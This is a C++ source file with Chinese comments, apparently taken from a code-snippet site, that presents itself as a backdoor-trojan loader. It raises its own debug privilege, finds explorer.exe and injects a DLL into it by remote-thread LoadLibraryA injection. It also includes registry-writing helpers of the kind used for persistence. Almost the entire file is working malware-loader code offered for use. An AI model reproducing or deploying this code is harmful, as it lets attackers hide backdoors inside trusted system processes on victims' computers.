- #include "stdafx.h"
- #include <windows.h>
- #include <Tlhelp32.h>
- /**
- * 提升后门自身权限
- */
- bool EnableDebugPriv(const char * name)
- {
- HANDLE hToken;
- TOKEN_PRIVILEGES tp;
- LUID luid;
- if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken)) return false;
- //获得进程本地唯一ID
- if(!LookupPrivilegeValue(NULL, name, &luid)) return false;
- tp.PrivilegeCount = 1;
- tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
- tp.Privileges[0].Luid = luid;
- //调整进程权限
- if(!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) return false;
- return true;
- }
- /**
- * 将dll注入某进程
- * @param DllFullPath 后门木马
- * @param dwRemoteProcessId 进程编号
- */
- bool InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
- {
- HANDLE hRemoteProcess, hRemoteThread;
- if(!EnableDebugPriv(SE_DEBUG_NAME)) return false;
- //打开目标进程
- if((hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId)) == NULL) return false;
- char *pszLibFileRemote;
- pszLibFileRemote = (char *)VirtualAllocEx(hRemoteProcess, NULL, lstrlen(DllFullPath) + 1, MEM_COMMIT, PAGE_READWRITE);
- if(pszLibFileRemote == NULL) return false;
- //把DLL的完整路径写入到内存
- if(WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (void*)DllFullPath, lstrlen(DllFullPath) + 1, NULL) == 0) return false;
- //得到LoadLibraryA函数地址
- PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
- if(pfnStartAddr == NULL) return false;
- if((hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL)) == NULL) return false;
- return true;
- }
- /**
- * 获取某进程编号
- * @param ProcessName 进程名
- * return 如果失败则返回0
- */
- DWORD GetProcessID(char *ProcessName)
- {
- PROCESSENTRY32 pe32;
- pe32.dwSize = sizeof(pe32);
- //得到系统内所有进程快照
- HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- if(hProcessSnap == INVALID_HANDLE_VALUE) return 0;
- //枚举列表中的第一个进程
- BOOL bProcess = Process32First(hProcessSnap, &pe32);
- while(bProcess)
- {
- if(strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)
- //if(strcmp(pe32.szExeFile, ProcessName) == 0)
- {
- //return pe32.th32ParentProcessID;
- return pe32.th32ProcessID;
- }
- //继续查找下一个
- bProcess = Process32Next(hProcessSnap, &pe32);
- }
- CloseHandle(hProcessSnap);
- return 0;
- }
- /**
- * 修改字符串类型键值
- */
- BOOL CreateStringReg(HKEY hRoot,char *szSubKey,char* ValueName,char *Data)
- {
- HKEY hKey;
- //打开注册表键,不存在则创建它
- long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);
- if (lRet!=ERROR_SUCCESS) return false;
- //修改注册表键值,没有则创建它
- lRet=RegSetValueEx(hKey,ValueName,0,REG_EXPAND_SZ,(BYTE*)Data,strlen(Data));
- if (lRet!=ERROR_SUCCESS) return false;
- RegCloseKey(hKey);
- return true;
- }
- /**
- * 用于修改数字类型键值
- */
- BOOL CreateDWORDReg(HKEY hRoot,char *szSubKey,char* ValueName,DWORD Data)
- {
- HKEY hKey;
- //打开注册表键,不存在则创建它
- long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);
- if (lRet!=ERROR_SUCCESS) return false;
- DWORD dwSize=sizeof(DWORD);
- //修改注册表键值,没有则创建它
- lRet=RegSetValueEx(hKey,ValueName,0,REG_DWORD,(BYTE*)&Data,dwSize);
- if (lRet!=ERROR_SUCCESS) return false;
- RegCloseKey(hKey);
- return true;
- }
- int main(int argc, char* argv[])
- {
- char DllPath[255];
- //得到IE进程
- DWORD Pid=GetProcessID("EXPLORER.EXE");
- //得到程序自身路径
- GetCurrentDirectory(sizeof(DllPath), DllPath);
- //得到DLL带路径文件名
- strcat(DllPath, "\\\\InjectDLL.dll");
- //注入IE进程
- if(Pid) InjectDll(DllPath, Pid);
- return 0;
- }
- //该片段来自于http://www.codesnippet.cn/detail/221020136553.html
来源: http://www.codesnippet.cn/detail/221020136553.html